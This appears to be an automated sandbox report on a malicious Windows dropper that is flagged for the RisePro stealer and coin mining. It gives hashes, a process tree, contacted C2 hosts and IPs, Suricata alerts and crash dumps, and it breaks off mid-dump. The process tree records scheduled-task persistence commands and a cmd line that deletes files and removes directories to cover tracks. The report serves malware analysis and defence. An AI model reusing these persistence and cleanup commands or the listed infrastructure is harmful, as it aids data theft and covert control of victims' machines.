Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 20, 2024, 8:10 p.m.	July 20, 2024, 8:29 p.m.

Size	4.4MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`8f8f6a36a8b827ceaae1228fd2669002`
SHA256	`0947872f18afd457962627cd08eae78498cd6ed27219da7f45a294a0e9e6c947`
CRC32	`EAF9DD84`
ssdeep	`98304:Ry6lwYZDXZJeoV95KoyxKxQQYj50PvDUXgTYbhGC/Mg:7Z1JV9N8Tj5EDUwTYNGMMg`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE64 - (no description) UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

AppGate018ver1.exe "C:\Users\test22\AppData\Local\Temp\AppGate018ver1.exe"
2552
- d_RIPuBmnjojf5JMU6a5QhMe.exe C:\Users\test22\Documents\SimpleAdobe\d_RIPuBmnjojf5JMU6a5QhMe.exe
  1264
- nHLIm6xHX7c236uOGqXkdPJG.exe C:\Users\test22\Documents\SimpleAdobe\nHLIm6xHX7c236uOGqXkdPJG.exe
  148
- D_Lr3ok7w7oLDH8Q70lFMUK9.exe C:\Users\test22\Documents\SimpleAdobe\D_Lr3ok7w7oLDH8Q70lFMUK9.exe
  2212
  - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
    2860
  - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
    3060
- y0Q2LMuickieMvG8m310BTdg.exe C:\Users\test22\Documents\SimpleAdobe\y0Q2LMuickieMvG8m310BTdg.exe
  2196
- EN4TCgpUszKEwT9miRPGOajK.exe C:\Users\test22\Documents\SimpleAdobe\EN4TCgpUszKEwT9miRPGOajK.exe
  2164
- FjsNdi4kjdtz2qw1MphlaqEs.exe C:\Users\test22\Documents\SimpleAdobe\FjsNdi4kjdtz2qw1MphlaqEs.exe
  2224
- rYWTjDsqXT4AcDkoeJs_yZP2.exe C:\Users\test22\Documents\SimpleAdobe\rYWTjDsqXT4AcDkoeJs_yZP2.exe
  2276
- 7CF2bZR8HWtuPTUKAqzCc3OT.exe C:\Users\test22\Documents\SimpleAdobe\7CF2bZR8HWtuPTUKAqzCc3OT.exe
  2368
  - MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    2920
    - cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\BGDGHJEHJJDA" & exit
      2088
      - timeout.exe timeout /t 10
        1088
- _pE7OUzePdg8dQq0bonZyFkX.exe C:\Users\test22\Documents\SimpleAdobe\_pE7OUzePdg8dQq0bonZyFkX.exe
  2320
  - _pE7OUzePdg8dQq0bonZyFkX.tmp "C:\Users\test22\AppData\Local\Temp\is-L49PN.tmp\_pE7OUzePdg8dQq0bonZyFkX.tmp" /SL5="$60138,5820132,54272,C:\Users\test22\Documents\SimpleAdobe\_pE7OUzePdg8dQq0bonZyFkX.exe"
    1812
    - soundchangerbeta32.exe "C:\Users\test22\AppData\Local\Sound Changer Beta\soundchangerbeta32.exe" -i
      2896
    - soundchangerbeta32.exe "C:\Users\test22\AppData\Local\Sound Changer Beta\soundchangerbeta32.exe" -s
      2456
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
lop.foxesjoy.com	A 172.67.159.232 A 104.21.66.124	172.67.159.232
iplogger.org	A 104.21.4.208 A 172.67.132.113	104.21.4.208
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18	23.67.53.17
ipinfo.io	A 34.117.59.81	34.117.59.81
steamcommunity.com	A 96.7.99.225	23.66.133.162
t.me	A 149.154.167.99	149.154.167.99
pool.hashvault.pro	A 125.253.92.50 A 131.153.76.130	131.153.76.130
api.myip.com	A 172.67.75.163 A 104.26.9.59 A 104.26.8.59	172.67.75.163
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.5.15
api64.ipify.org	A 173.231.16.77 A 104.237.62.213	104.237.62.213
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.134.233

IP Address	Status	Action
104.21.66.124	Active	Moloch
104.237.62.213	Active	Moloch
104.26.4.15	Active	Moloch
121.254.136.9	Active	Moloch
131.153.76.130	Active	Moloch
149.154.167.99	Active	Moloch
162.159.130.233	Active	Moloch
164.124.101.2	Active	Moloch
172.67.132.113	Active	Moloch
172.67.75.163	Active	Moloch
176.111.174.109	Active	Moloch
34.117.59.81	Active	Moloch
77.105.133.27	Active	Moloch
78.46.255.249	Active	Moloch
79.137.192.13	Active	Moloch
89.111.172.64	Active	Moloch
91.103.252.177	Active	Moloch
94.232.45.38	Active	Moloch
96.7.99.225	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:53004 -> 164.124.101.2:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity
TCP 192.168.56.101:49166 -> 104.237.62.213:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
TCP 192.168.56.101:49166 -> 104.237.62.213:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 104.237.62.213:443	2047703	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI	Misc activity
UDP 192.168.56.101:55146 -> 164.124.101.2:53	2054168	ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)	Device Retrieving External IP Address Detected
TCP 104.237.62.213:443 -> 192.168.56.101:49167	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 77.105.133.27:80 -> 192.168.56.101:49178	2400007	ET DROP Spamhaus DROP Listed Traffic Inbound group 8	Misc Attack
TCP 192.168.56.101:49168 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49168 -> 34.117.59.81:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49178 -> 77.105.133.27:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 172.67.75.163:443	2042969	ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49164 -> 172.67.75.163:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 79.137.192.13:80 -> 192.168.56.101:49174	2400007	ET DROP Spamhaus DROP Listed Traffic Inbound group 8	Misc Attack
TCP 176.111.174.109:80 -> 192.168.56.101:49175	2400029	ET DROP Spamhaus DROP Listed Traffic Inbound group 30	Misc Attack
TCP 192.168.56.101:49170 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49182 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49182 -> 162.159.130.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49182 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49183 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49183 -> 162.159.130.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49181 -> 104.21.66.124:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49183 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49181 -> 104.21.66.124:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49179 -> 94.232.45.38:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49192 -> 104.21.66.124:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49178 -> 77.105.133.27:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 94.232.45.38:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 79.137.192.13:80 -> 192.168.56.101:49174	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 79.137.192.13:80 -> 192.168.56.101:49174	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49185 -> 104.21.66.124:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 89.111.172.64:80 -> 192.168.56.101:49177	2049228	ET HUNTING Redirect to Discord Attachment Download	Misc activity
UDP 192.168.56.101:54883 -> 164.124.101.2:53	2035466	ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)	Misc activity
TCP 192.168.56.101:49188 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49188 -> 162.159.130.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49188 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 176.111.174.109:80 -> 192.168.56.101:49175	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 176.111.174.109:80 -> 192.168.56.101:49175	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 176.111.174.109:80 -> 192.168.56.101:49175	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.101:49180 -> 104.21.66.124:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.101:49180 -> 104.21.66.124:80	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49173 -> 79.137.192.13:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 79.137.192.13:80 -> 192.168.56.101:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 79.137.192.13:80 -> 192.168.56.101:49173	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49189 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.101:49189 -> 162.159.130.233:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49189 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 77.105.133.27:80 -> 192.168.56.101:49178	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.105.133.27:80 -> 192.168.56.101:49178	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 94.232.45.38:80 -> 192.168.56.101:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 94.232.45.38:80 -> 192.168.56.101:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 94.232.45.38:80 -> 192.168.56.101:49179	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 77.105.133.27:80 -> 192.168.56.101:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.105.133.27:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 77.105.133.27:80 -> 192.168.56.101:49176	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.101:49173 -> 79.137.192.13:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 79.137.192.13:80 -> 192.168.56.101:49173	2014819	ET INFO Packed Executable Download	Misc activity
TCP 79.137.192.13:80 -> 192.168.56.101:49173	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 77.105.133.27:50505 -> 192.168.56.101:49200	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	A Network Trojan was detected
TCP 192.168.56.101:49200 -> 77.105.133.27:50505	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	A Network Trojan was detected
TCP 192.168.56.101:49200 -> 77.105.133.27:50505	2049060	ET MALWARE RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.101:49214 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 149.154.167.99:443 -> 192.168.56.101:49216	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.101:49218 -> 96.7.99.225:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 78.46.255.249:443 -> 192.168.56.101:49221	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
UDP 192.168.56.101:52753 -> 164.124.101.2:53	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	Crypto Currency Mining Activity Detected
TCP 192.168.56.101:49215 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.101:49215 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49215 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
UDP 192.168.56.101:52815 -> 164.124.101.2:53	2035948	ET POLICY IP Check Domain (iplogger .org in DNS Lookup)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49199 -> 172.67.132.113:443	2035949	ET POLICY IP Check Domain (iplogger .org in TLS SNI)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49199 -> 172.67.132.113:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49182 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 89.111.172.64:80 -> 192.168.56.101:49177	2049228	ET HUNTING Redirect to Discord Attachment Download	Misc activity
TCP 192.168.56.101:49214 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.101:49215 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.101:49188 -> 162.159.130.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49164 172.67.75.163:443	C=US, O=Let's Encrypt, CN=R3	CN=myip.com	87:d2:90:92:b6:6a:56:3c:25:f1:ae:56:52:d9:2b:ac:16:44:bb:bc
TLSv1 192.168.56.101:49170 104.26.4.15:443	C=US, O=Google Trust Services, CN=WR1	CN=db-ip.com	61:a1:85:30:8f:04:68:e2:7b:34:d7:83:41:95:57:f4:94:c0:17:c3
TLSv1 192.168.56.101:49192 104.21.66.124:443	C=US, O=Google Trust Services, CN=WE1	CN=foxesjoy.com	7c:98:d5:06:20:bf:d9:af:30:ac:9a:78:12:fe:95:20:93:e7:d1:f0
TLSv1 192.168.56.101:49218 96.7.99.225:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	10:20:2b:ee:30:69:cc:b6:ac:5e:47:04:71:ca:b0:75:78:51:58:f5
TLS 1.3 192.168.56.101:49226 131.153.76.130:443	None	None	None
TLSv1 192.168.56.101:49199 172.67.132.113:443	C=US, O=Google Trust Services, CN=WE1	CN=iplogger.org	08:dd:39:df:d9:24:0d:d7:6f:12:c0:8e:bc:78:4a:76:c1:28:90:07

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 20, 2024, 8:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2024, 8:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2024, 8:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 20, 2024, 8:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2024, 8:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2024, 8:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2024, 8:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 20, 2024, 8:08 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 20, 2024, 8:08 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 20, 2024, 8:08 p.m.			0	0
IsDebuggerPresent July 20, 2024, 8:08 p.m.			0	0
IsDebuggerPresent July 20, 2024, 8:08 p.m.			0	0
IsDebuggerPresent July 20, 2024, 8:08 p.m.			0	0
IsDebuggerPresent July 20, 2024, 8:08 p.m.			0	0

Command line console output was observed (50 out of 2655 events)

Time & API	Arguments	Status	Return
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: AAA console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Success created. console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Own head console_handle: 0x00000007	1	1
WriteConsoleA July 20, 2024, 8:08 p.m.	buffer: Earth console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 20, 2024, 8:08 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	_RDATA
section	.vmpVF}A

One or more processes crashed (8 events)

Time & API	Arguments	Status
__exception__ July 20, 2024, 8:08 p.m.	stacktrace: d_lr3ok7w7oldh8q70lfmuk9+0x5e99e5 @ 0x16399e5 d_lr3ok7w7oldh8q70lfmuk9+0x560f11 @ 0x15b0f11 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 43 16 a5 8b 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 4127968 registers.edi: 18194432 registers.eax: 4127968 registers.ebp: 4128048 registers.edx: 2130566132 registers.ebx: 32 registers.esi: 1995994155 registers.ecx: 2101280768	1
__exception__ July 20, 2024, 8:08 p.m.	stacktrace: exception.instruction_r: ed e9 3d 41 03 00 c3 e9 b2 85 01 00 f9 33 09 5d exception.symbol: d_lr3ok7w7oldh8q70lfmuk9+0x5dde4a exception.instruction: in eax, dx exception.module: D_Lr3ok7w7oLDH8Q70lFMUK9.exe exception.exception_code: 0xc0000096 exception.offset: 6151754 exception.address: 0x162de4a registers.esp: 4128088 registers.edi: 21602424 registers.eax: 1750617430 registers.ebp: 18194432 registers.edx: 2130532438 registers.ebx: 0 registers.esi: 13 registers.ecx: 20	1
__exception__ July 20, 2024, 8:08 p.m.	stacktrace: exception.instruction_r: ed e9 28 29 03 00 de e9 5d ac 0a 00 00 00 62 c4 exception.symbol: d_lr3ok7w7oldh8q70lfmuk9+0x5bd977 exception.instruction: in eax, dx exception.module: D_Lr3ok7w7oLDH8Q70lFMUK9.exe exception.exception_code: 0xc0000096 exception.offset: 6019447 exception.address: 0x160d977 registers.esp: 4128088 registers.edi: 21602424 registers.eax: 1447909480 registers.ebp: 18194432 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 13 registers.ecx: 10	1
__exception__ July 20, 2024, 8:08 p.m.	stacktrace: exception.instruction_r: 81 3e 4c 6f 61 64 75 f2 81 7e 08 61 72 79 41 75 exception.instruction: cmp dword ptr [esi], 0x64616f4c exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x3601cb registers.esp: 14679592 registers.edi: 1973072088 registers.eax: 1972830208 registers.ebp: 632 registers.edx: 1973069536 registers.ebx: 0 registers.esi: 1973551114 registers.ecx: 0	1
__exception__ July 20, 2024, 8:08 p.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x76f89e31 IsBadReadPtr+0xcc CreateSemaphoreA-0x31 kernel32+0x3d141 @ 0x755ed141 fjsndi4kjdtz2qw1mphlaqes+0x6bc3 @ 0xdc6bc3 fjsndi4kjdtz2qw1mphlaqes+0xa3d5 @ 0xdca3d5 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x76f89e58 registers.esp: 3865036 registers.edi: 8060928 registers.eax: 4294967288 registers.ebp: 3865080 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 8060928	1
__exception__ July 20, 2024, 8:08 p.m.	stacktrace: exception.instruction_r: 81 3e 4c 6f 61 64 75 f2 81 7e 08 61 72 79 41 75 exception.instruction: cmp dword ptr [esi], 0x64616f4c exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x2501cb registers.esp: 37354864 registers.edi: 1973072088 registers.eax: 1972830208 registers.ebp: 632 registers.edx: 1973069536 registers.ebx: 0 registers.esi: 1973551114 registers.ecx: 0	1
__exception__ July 20, 2024, 8:08 p.m.	stacktrace: _pe7ouzepdg8dqq0bonzyfkx+0x40de2 @ 0x440de2 _pe7ouzepdg8dqq0bonzyfkx+0x42c27 @ 0x442c27 _pe7ouzepdg8dqq0bonzyfkx+0x482f0 @ 0x4482f0 _pe7ouzepdg8dqq0bonzyfkx+0x3e1f5 @ 0x43e1f5 _pe7ouzepdg8dqq0bonzyfkx+0x3d12b @ 0x43d12b _pe7ouzepdg8dqq0bonzyfkx+0x8f668 @ 0x48f668 _pe7ouzepdg8dqq0bonzyfkx+0x7b9a6 @ 0x47b9a6 _pe7ouzepdg8dqq0bonzyfkx+0x933f1 @ 0x4933f1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 06 c7 45 fc fe ff ff ff 85 db 0f 85 97 34 00 exception.symbol: WNetCloseEnum+0x14 WNetOpenEnumW-0x11c mpr+0x2dea exception.instruction: mov eax, dword ptr [esi] exception.module: mpr.dll exception.exception_code: 0xc0000005 exception.offset: 11754 exception.address: 0x703c2dea registers.esp: 1637612 